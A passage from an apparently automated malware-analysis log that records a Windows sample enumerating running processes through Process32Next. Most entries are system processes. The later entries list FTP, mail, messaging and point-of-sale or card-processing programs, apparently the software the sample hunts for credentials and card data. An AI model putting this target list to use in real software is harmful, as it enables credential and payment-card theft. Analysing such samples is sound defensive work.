cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.213] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.215] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.216] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.218] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.220] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.221] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0180.223] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0180.224] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0180.226] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0180.228] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.230] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0180.231] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0180.233] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0180.235] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0180.236] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0180.239] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0180.240] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.242] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.244] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0180.245] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0180.247] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0180.248] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0180.252] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.253] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0180.255] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0180.256] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0180.258] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0180.259] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0180.261] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0180.263] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0180.264] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0180.266] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0180.267] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0180.269] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0180.270] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0180.272] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0180.273] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0180.275] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0180.277] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0180.278] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0180.280] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0180.282] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0180.283] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0180.285] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0180.291] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0180.295] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0180.297] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0180.299] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0180.300] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0180.302] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0180.305] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0180.307] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0180.309] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0180.311] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0180.313] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0180.316] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0180.321] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0180.323] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0180.325] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0180.327] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0180.329] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0180.335] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0180.337] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0180.340] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0180.344] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0180.347] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0180.350] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0180.353] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0180.356] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0180.359] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0180.362] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0180.366] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0180.368] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0180.372] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0180.379] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0180.382] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0180.384] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0180.387] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0180.389] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0180.390] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0180.485] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0180.488] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0180.491] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0180.493] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0180.495] Process32Next (in: hSnapshot=0x79c, lppe=0x102efe20 | out: 